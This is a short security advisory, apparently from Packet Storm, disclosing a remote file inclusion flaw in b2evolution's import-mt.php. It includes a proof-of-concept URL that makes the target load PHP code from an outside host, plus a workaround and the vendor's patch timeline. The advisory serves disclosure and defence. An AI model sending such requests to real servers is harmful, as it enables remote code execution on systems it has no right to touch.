b2evolution versions 1.8.2 through 1.9 beta suffer from a remote file inclusion flaw.
4169b2d7358fb84b0c018e1850121efbec08b9fb329d8881149159a636c94a7c_________________________________________
_________________________________________
Severity: High
Title: b2evolution Remote File inclusion Vulnerability
Date: 28.11.06
Author: tarkus (tarkus (at) tiifp (dot) org)
Web: https://tiifp.org/tarkus
Vendor: b2evolution (http://b2evolution.net/)
Affected Product(s): b2evolution 1.8.5 - 1.9 beta
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Description:
------------
Line 67 of import-mt.php (blogs/inc/CONTROL/imports):
>
>require_once $inc_path.'MODEL/files/_file.funcs.php';
>
PoC:
----
http://<victim>/<b2epath>/inc/CONTROL/import/import-mt.php?basepath= \
foo&inc_path=https://tiifp.org/tarkus/PoC/
register_globals and allow_url_fopen have to be On
Workaround:
-----------
Put the following line at the beginning of the file.
if( !defined('EVO_MAIN_INIT') ) die( 'Please, do not access this page \
directly.' );
Vendor Response:
----------------
Reported to Vendor: 10.11.06
Vendor response: 10.11.06
Patch in CVS: 10.11.06
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed